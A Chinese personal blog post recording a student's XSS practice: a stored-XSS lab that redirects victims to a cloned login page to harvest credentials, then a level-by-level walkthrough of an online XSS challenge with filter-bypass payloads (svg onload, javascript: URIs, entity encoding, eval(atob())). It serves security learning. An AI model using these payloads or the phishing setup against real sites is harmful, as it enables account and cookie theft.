<p><img src="https://img-blog.csdnimg.cn/20200502181803475.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>点击存储型xss，<br><img src="https://img-blog.csdnimg.cn/20200502182830554.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>自动跳转到克隆的登录界面上，然后输入账号密码登录<br><img src="https://img-blog.csdnimg.cn/20200502181911837.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>就会回到原来的网站登录页面。这个时候已经成功拿到了用户名和密码，后面就不管了。<br><img src="https://img-blog.csdnimg.cn/20200502181926710.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>查看盗取的信息，在kali终端就能看到下面的页面。<br>因为这里我试了两次，所以会有两次的记录。</p>
<p><img src="https://img-blog.csdnimg.cn/20200502182033363.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>然后试验完成，Ctrl+Z就可以退出了。</p>
<h1 id="xss之旅"><a href="#xss之旅" class="headerlink" title="xss之旅"></a>xss之旅</h1><p><a target="_blank" rel="noopener" href="http://test.ctf8.com/">在线xss平台</a></p>
<h2 id="第一关"><a href="#第一关" class="headerlink" title="第一关"></a>第一关</h2><p><img src="https://img-blog.csdnimg.cn/20200503172340635.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>构造简单的弹框代码成功弹窗即可。<code>&lt;script&gt;alert(1);&lt;/script&gt;</code><br><img src="https://img-blog.csdnimg.cn/20200503172424813.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<h2 id="第二关"><a href="#第二关" class="headerlink" title="第二关"></a>第二关</h2><p>开始构造一个弹框的代码，发现无法弹框了。<br><img src="https://img-blog.csdnimg.cn/20200503172646989.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>查看一下源码<br><img src="https://img-blog.csdnimg.cn/20200503172811593.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>发现这里是我插入代码的位置，然后看到插入点是在input标签内部的，所以无法让浏览器识别弹框代码。这里要做的就是将前面的input标签提前闭合，还有后面的<code>&gt;</code>也要给它闭合，而且还要让它弹框。<br>所以这里构造</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">"<span class="token operator">></span><span class="token operator">&lt;</span>script<span class="token operator">></span>alert<span class="token punctuation">(</span><span class="token string">'XSS'</span><span class="token punctuation">)</span><span class="token operator">&lt;</span>/script<span class="token operator">></span><span class="token operator">&lt;</span></code></pre>
<p><img src="https://img-blog.csdnimg.cn/20200503172839194.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<h2 id="第三关"><a href="#第三关" class="headerlink" title="第三关"></a>第三关</h2><p><img src="https://img-blog.csdnimg.cn/20200506153538350.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<p>可以看出是尖括号，被转义了，所以尝试换个事件进行弹窗。<br>前面的value值是可以用单引号闭合，后面还有个双引号，可以把它以及后面的语句注释掉。构造payload</p>
<pre class="language-css" data-language="css"><code class="language-css">1' onmouseover=<span class="token function">alert</span><span class="token punctuation">(</span>1<span class="token punctuation">)</span>//</code></pre>
<p><img src="https://img-blog.csdnimg.cn/20200506154047475.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>知识拓展：<br>onmouseover在代码中表示的含义是 ——当鼠标指针移至元素之上时运行脚本<br>还有其他的事件可以选择使用，以下是我找的其他xss可以触发的事件的代码。<br><img src="https://img-blog.csdnimg.cn/20200506154529785.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<h2 id="第四关"><a href="#第四关" class="headerlink" title="第四关"></a>第四关</h2><p>第四关先用第三关的payload试一下，然后查看源码。</p>
<p><img src="https://img-blog.csdnimg.cn/20200506154318602.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<p>只需要将第三关的单引号换成双引号即可<br><img src="https://img-blog.csdnimg.cn/20200506154212719.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<h2 id="第五关"><a href="#第五关" class="headerlink" title="第五关"></a>第五关</h2><p>进行on事件。但是发现on被分开了，中间多了个下划线<code>_</code><br><img src="https://img-blog.csdnimg.cn/20200506155049670.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>那就再换构造语句，javascript伪协议<br>JavaScript伪协议介绍<br>将JavaScript代码添加到客户端的方法是把它放置在伪协议说明符javascript:后的URL中。这个特殊的协议声明了URL的主体是任意的javascript代码，它由javascript的解释器运行。<br>如果javascript:URL中的javascript代码中含有多个语句，必须使用分号将这些语句分隔开。</p>
<pre class="language-css" data-language="css"><code class="language-css"><span class="token property">javascript</span><span class="token punctuation">:</span>var now = new <span class="token function">Date</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token string">"&lt;h1>The time is:&lt;/h1>"</span> +now<span class="token punctuation">;</span>
javascript URL还可以含有只执行动作，但不返回值的javascript语句
<span class="token property">javascript</span><span class="token punctuation">:</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"hello,world!"</span><span class="token punctuation">)</span></code></pre>

<p>可以使用a标签来进行绕过。</p>
<pre class="language-css" data-language="css"><code class="language-css"><span class="token string">">&lt;a href="</span><span class="token property">javascript</span><span class="token punctuation">:</span><span class="token function">alert</span><span class="token punctuation">(</span>document.domain<span class="token punctuation">)</span>"</code></pre>
<p><img src="https://img-blog.csdnimg.cn/20200506162150941.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<h2 id="第六关"><a href="#第六关" class="headerlink" title="第六关"></a>第六关</h2><p><img src="https://img-blog.csdnimg.cn/20200506162328765.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>可以看出，将href过滤了，还有其他的几个，on还有script都被过滤了。<br>看了大佬的博客，说是str_replace函数进行处理了，使用大小写绕过就行了。</p>
<pre class="language-css" data-language="css"><code class="language-css">">&lt;svg/Onload=<span class="token function">alert</span><span class="token punctuation">(</span>document.domain<span class="token punctuation">)</span>>%0a</code></pre>
<p><img src="https://img-blog.csdnimg.cn/20200506163700295.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>知识补充<br>HTML中的svg介绍<br>SVG意为可缩放矢量图形<br>SVG使用XML格式定义图像。<br>SVG文件可以通过以下标签嵌入HTML文档：</p>
<pre class="language-css" data-language="css"><code class="language-css">&lt;embed>、&lt;object>或者&lt;iframe>、也可以使用svg标签插入。</code></pre>

<p>闭合触发xss，</p>
<pre class="language-css" data-language="css"><code class="language-css">">&lt;svg onload=<span class="token function">alert</span><span class="token punctuation">(</span>document.domain<span class="token punctuation">)</span>>%0a</code></pre>
<h2 id="第七关"><a href="#第七关" class="headerlink" title="第七关"></a>第七关</h2><p><img src="https://img-blog.csdnimg.cn/20200506164055341.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>这里它将我的on过滤了，变成了空格，然后想到了双写绕过<br>payload</p>
<pre class="language-css" data-language="css"><code class="language-css">">&lt;svg oonnload=<span class="token function">alert</span><span class="token punctuation">(</span>document.domain<span class="token punctuation">)</span>>%0a</code></pre>
<p><img src="https://img-blog.csdnimg.cn/20200506164235773.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<h2 id="第八关"><a href="#第八关" class="headerlink" title="第八关"></a>第八关</h2><p><img src="https://img-blog.csdnimg.cn/20200506164949929.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>可以看出href被过滤了，双引号也被过滤了，script也被过滤。这个过滤了这么多东西，要想到通过编码来绕过。<br>HTML编码可以进行绕过，</p>
<pre class="language-css" data-language="css"><code class="language-css">&amp;#106<span class="token punctuation">;</span>&amp;#97<span class="token punctuation">;</span>&amp;#118<span class="token punctuation">;</span>&amp;#97<span class="token punctuation">;</span>&amp;#115<span class="token punctuation">;</span>&amp;#99<span class="token punctuation">;</span>&amp;#114<span class="token punctuation">;</span>&amp;#105<span class="token punctuation">;</span>&amp;#112<span class="token punctuation">;</span>&amp;#116<span class="token punctuation">;</span>&amp;#58<span class="token punctuation">;</span>&amp;#97<span class="token punctuation">;</span>&amp;#108<span class="token punctuation">;</span>&amp;#101<span class="token punctuation">;</span>&amp;#114<span class="token punctuation">;</span>&amp;#116<span class="token punctuation">;</span>&amp;#40<span class="token punctuation">;</span>&amp;#49<span class="token punctuation">;</span>&amp;#41<span class="token punctuation">;</span></code></pre>
<p><img src="https://img-blog.csdnimg.cn/20200506171517900.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>这个是一种情况，还有一种情况是内容过滤，比如说，想通过弹窗事件来弹出某个内容，比如cookie。但是cookie如果被过滤了，<br>可以先将cookie进行base64加密，成一串base64编码，然后<br>atob：将base64进行解码，转换成明文，并通过eval来执行javascript代码。<br>再通过使用eval来执行语句。<br>可以构造一下payload</p>
<pre class="language-css" data-language="css"><code class="language-css">&lt;script><span class="token function">eval</span><span class="token punctuation">(</span><span class="token function">atob</span><span class="token punctuation">(</span><span class="token string">'base64编码'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>&lt;/script></code></pre>
<h2 id="第九关"><a href="#第九关" class="headerlink" title="第九关"></a>第九关</h2><p><img src="https://img-blog.csdnimg.cn/2020051110511482.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>不合法的话，那就加上<code>http://</code><br><img src="https://img-blog.csdnimg.cn/2020051111233829.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>发现，链接是合法了，但是script被过滤了。所以要进行绕过，<br>可以选择使用HTML编码绕过，还可以利用制表符(%09)等方法进行过滤。</p>
<pre class="language-payload" data-language="payload"><code class="language-payload">第一个：
javasc&amp;#x72;ipt:%0dhttp:&#x2F;&#x2F;www.lalala.io%0dalert(1) 
第二个：
javascr%09ipt:alert(1)&#x2F;&#x2F;http:&#x2F;&#x2F;</code></pre>
<p><img src="https://img-blog.csdnimg.cn/20200511113926227.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>这个是将r转换成HTML编码了，当然也可以转换其他的字母，使得绕过script就行。</p>
<h2 id="第十关"><a href="#第十关" class="headerlink" title="第十关"></a>第十关</h2><p>没有看到注入框，结果找了一会，在控制台看到了隐藏的信息。<br>一个隐藏的表单。<br><img src="https://img-blog.csdnimg.cn/20200529224510949.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>猜想可以在这里面进行注入，具体的还要一个一个试。<br>先进行在t_link框里进行注入尝试。，不过失败了。<br><img src="https://img-blog.csdnimg.cn/20200529224634161.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>一个个尝试，最后发现在t_sort可以插入<br><img src="https://img-blog.csdnimg.cn/20200529224853425.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>主要是尝试在哪个位置可以插入代码。</p>
<p> 闯关就先到这里吧，然后再把最近接触到的关于xss注入的知识点记录一下。</p>
<h1 id="xss注入番外"><a href="#xss注入番外" class="headerlink" title="xss注入番外"></a>xss注入番外</h1><ol>
<li>属性中的xss闭合引入事件</li>
</ol>
<pre class="language-bash" data-language="bash"><code class="language-bash">" <span class="token assign-left variable">onmouseover</span><span class="token operator">=</span>alert<span class="token punctuation">(</span>document.domain<span class="token punctuation">)</span><span class="token operator">></span>        / /这个是鼠标放在上面就会触发xss，</code></pre>
<p>当然还有其他属性，点击后触发，等触发事件。<br>完整语句是</p>
<pre class="language-shell" data-language="shell"><code class="language-shell"><span class="token operator">&lt;</span>input/其他的标签 <span class="token assign-left variable">value</span><span class="token operator">=</span> 空 <span class="token assign-left variable">onmouseover</span><span class="token operator">=</span><span class="token string">"alert(document.domain)"</span><span class="token operator">></span></code></pre>

<ol start="2">
<li>列表中的xss事件<br>HTML中的post方式的from表单提交。可以利用，插入xss语句。<br>burpsuite测试xss，使用Burpsuite截取http请求，修改提交参数。<br>闭合触发xss事件，用通过burpsuite在认为可能的地方插入xss代码进行闭合等操作。</li>
<li>HTML中的svg介绍<br>SVG意为可缩放矢量图形<br>SVG使用XML格式定义图像。<br>SVG文件可以通过以下标签嵌入HTML文档：</li>
</ol>
<pre class="language-bash" data-language="bash"><code class="language-bash"><span class="token operator">&lt;</span>embed<span class="token operator">></span>、<span class="token operator">&lt;</span>object<span class="token operator">></span>或者<span class="token operator">&lt;</span>iframe<span class="token operator">></span>、也可以使用svg标签插入。
闭合触发xss，
"<span class="token operator">></span><span class="token operator">&lt;</span>svg <span class="token assign-left variable">onload</span><span class="token operator">=</span>alert<span class="token punctuation">(</span>document.domain<span class="token punctuation">)</span><span class="token operator">></span>%0a

诀窍：<span class="token variable"><span class="token variable">`</span>见框就插<span class="token variable">`</span></span>。</code></pre>
<ol start="4">
<li>HTML表单文本框介绍<br>HTML表单用于搜集不同类型的用户输入。表单元素指的是不同类型的input元素、复选框、单选按钮、提交按钮等等。text定义常规文本输入。<br>属性介绍：</li>
</ol>
<ul>
<li>value 属性规定输入字段的初始值</li>
<li>readonly属性规定输入字段为只读(不能修改)</li>
<li>disabled 属性规定输入字段是禁用的。被禁用的元素是不可用和不可点击的。被禁用的元素不会被提交。</li>
<li>size 属性规定输入字段的尺寸(以字符计)</li>
<li>maxlength 属性规定输入字段允许的最大长度。<br>如设置maxlength属性，则输入空间不会接受超过所允许数的字符。<br>该属性不会提供任何反馈。如果需要提醒用户，则必须编写JavaScript代码。<br>xss的payload长度计算<br>使用python的内置函数       <code>  len()</code><br>修改时直接修改maxlength参数就可以了。</li>
</ul>
<pre class="language-bash" data-language="bash"><code class="language-bash">payload 触发xss漏洞
<span class="token string">">&lt;svg/onload=alert(document.domain)>%0a
或者：    "</span> <span class="token assign-left variable">onmouseover</span><span class="token operator">=</span>alert<span class="token punctuation">(</span>document.domain<span class="token punctuation">)</span><span class="token operator">></span></code></pre>
<ol start="5">
<li>HTML事件介绍<br><img src="https://img-blog.csdnimg.cn/20200529230142530.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"></li>
<li>空格分割属性的xss<br>JavaScript伪协议介绍<br>将JavaScript代码添加到客户端的方法是把它放置在伪协议说明符javascript:后的URL中。这个特殊的协议声明了URL的主体是任意的javascript代码，它由javascript的解释器运行。<br>如果javascript:URL中的javascript代码中含有多个语句，必须使用分号将这些语句分隔开。</li>
</ol>
<pre class="language-bash" data-language="bash"><code class="language-bash">javascript:var now <span class="token operator">=</span> new Date<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token string">"&lt;h1>The time is:&lt;/h1>"</span> +now<span class="token punctuation">;</span>
javascript URL还可以含有只执行动作，但不返回值的javascript语句
javascript:alert<span class="token punctuation">(</span><span class="token string">"hello,world!"</span><span class="token punctuation">)</span></code></pre>
<ol start="7">
<li>绕过过滤domain为空的xss</li>
</ol>
<ul>
<li>双写绕过<br>过滤一个domain，可以制造这样的payload。<br>dodomainmain<br>这个payload使得浏览器将domain过滤掉，剩下的do和main重新构成了domain。</li>
<li>编码绕过<br>构造payload进行base64加密。<br>eval<br>atob：将base64进行解码，转换成明文，并通过eval来执行javascript代码。<script>eval(atob('base64编码'));</script></li>
<li>空格绕过：<br>如果浏览器过滤了script关键字或者其他的什么关键字，导致javascript代码无法执行，那么可以考虑空格绕过。</li>
<li>利用IE特性绕过xss过滤（只适用于IE浏览器）</li>
</ul>
<pre class="language-shell" data-language="shell"><code class="language-shell">IE特性：两个反引号``可以闭合一个左边双引号</code></pre>
<p>CSS绕过<br>CSS特性介绍<br><code>background:url(&quot;javascript:alert(document.domain);&quot;);</code>    设置背景颜色<br>这是利用javascript伪协议执行js，目前只有IE浏览器支持，其他的不支持</p>
<pre class="language-css" data-language="css"><code class="language-css">payload触发CSS
<span class="token property">background-color</span><span class="token punctuation">:</span>#f00<span class="token punctuation">;</span><span class="token property">background</span><span class="token punctuation">:</span><span class="token url"><span class="token function">url</span><span class="token punctuation">(</span><span class="token string url">"javascript:alert(document.domain);"</span><span class="token punctuation">)</span></span><span class="token punctuation">;</span></code></pre>

<p>先到这里，后续还有几个不常见的知识点，回头学了再补吧。最近有点累，要期末考试了，也该准备下复习了。睡觉睡觉，今天早点睡，不熬了。<br>对了突然想起来，这个好像是之前学长布置的作业来着，果然还是那个老毛病，不到检查作业最后一刻，绝对不提前写完。哈哈哈。下周十六周，刚刚好，截至周。<br>现在没事回头看看自己写的博客和印象笔记。哈哈学了不少东西呐。<br>从2020.1.12发的第一篇文章到现在4个多月了，看看还是蛮有成就感的。</p>
<p>嗯！要继续加油啊。</p>
<p>文末寄语：</p>
<blockquote>
<p>在这世上，有些东西是石头无法刻成的，在我们心里，有一块地方是无法锁住的，那块地方叫做希望。——《肖申克的救赎》</p>
</blockquote>
</div><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hand-coin-line"></use></svg></span><div id="reward-comment">I'm so cute. Please give me a candy.</div><div id="qr" style="display:none;"><div style="display:inline-block"><a target="_blank" rel="noopener" href="https://gitee.com/m0re/picture/raw/master/img/wechatpay.jpg"><img loading="lazy" src="https://gitee.com/m0re/picture/raw/master/img/wechatpay.jpg" alt="微信支付" title="微信支付"></a><div><span style="color:#2DC100"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-wechat-pay-line"></use></svg></span></div></div></div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>m0re</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://m0re.top/posts/117d2c7d/" title="XSS盗取用户信息实验及xss之旅闯关">https://m0re.top/posts/117d2c7d/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/posts/73d32882/" rel="prev" title="XSS跨站脚本攻击原理"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">XSS跨站脚本攻击原理</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/posts/cbecbb18/" rel="next" title="Windows系统远程提权、MySQL UDF提权"><span class="post-nav-text">Windows系统远程提权、MySQL UDF提权</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div><div class="hty-card" id="comment"><div class="comment-tooltip text-center"><span>尝试使用 utterances （基于 GitHub Issues）评论系统。</span><br><span>您可以点击下方按钮切换对应评论系统，</span><br><span><script>function showUtterances(){ document.querySelector(".utterances").style.display='block'; document.querySelector('#valine-container').style.display='none'; }function showValine(){ document.querySelector('#valine-container').style.display='block'; document.querySelector(".utterances").style.display='none'; }</script></span><br><span><a class="hty-button hty-button--raised" onclick="showValine()">Valine</a><a class="hty-button hty-button--raised" onclick="showUtterances()">utterances</a></span><br><span><style>.utterances{display:none;}</style></span><br></div><div id="valine-container"></div><script>Yun.utils.getScript("https://cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js", () => {
  const valineConfig = {"enable":true,"appId":"gUEA9zKLhCnMFxQI5kI20WiD-gzGzoHsz","appKey":"GQKAp04LNloy3MrDMv86MI3i","placeholder":"评论一下~&nbsp_(:з」∠)_ （填写邮箱可以收到回复通知～）","avatar":null,"pageSize":10,"visitor":true,"highlight":true,"recordIP":true,"enableQQ":true,"requiredFields":["nick","mail"],"el":"#valine-container","lang":"zh-cn"}
  valineConfig.path = "/posts/117d2c7d/"
  new Valine(valineConfig)
}, window.Valine);</script></div></main><footer class="sidebar-translate" id="footer"><div class="beian"><a rel="noopener" href="https://beian.miit.gov.cn/" target="_blank">豫ICP备2020025591号-1</a></div><div class="copyright"><span>&copy; 2020 – 2021 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> m0re</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v5.1.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.6.1</span></div><div class="live_time"><span>本博客已苟延残喘了</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2020-02-21T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div><div id="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_site_uv" title="总访客量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-line"></use></svg></span><span id="busuanzi_value_site_uv"></span></span><span class="footer-separator">|</span><span id="busuanzi_container_site_pv" title="总访问量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg></span><span id="busuanzi_value_site_pv"></span></span></div></footer><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#6200ee" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-search-line"></use></svg></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="/js/search/local-search.js" defer></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-close-line"></use></svg></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="搜索..." value=""></div><div id="local-search-result"></div></div></div><script src="https://cdn.jsdelivr.net/npm/live2d-widget@^3.1.3/lib/L2Dwidget.min.js"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"https://cdn.jsdelivr.net/npm/live2d-widget-model-wanko@1.0.5/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body></html>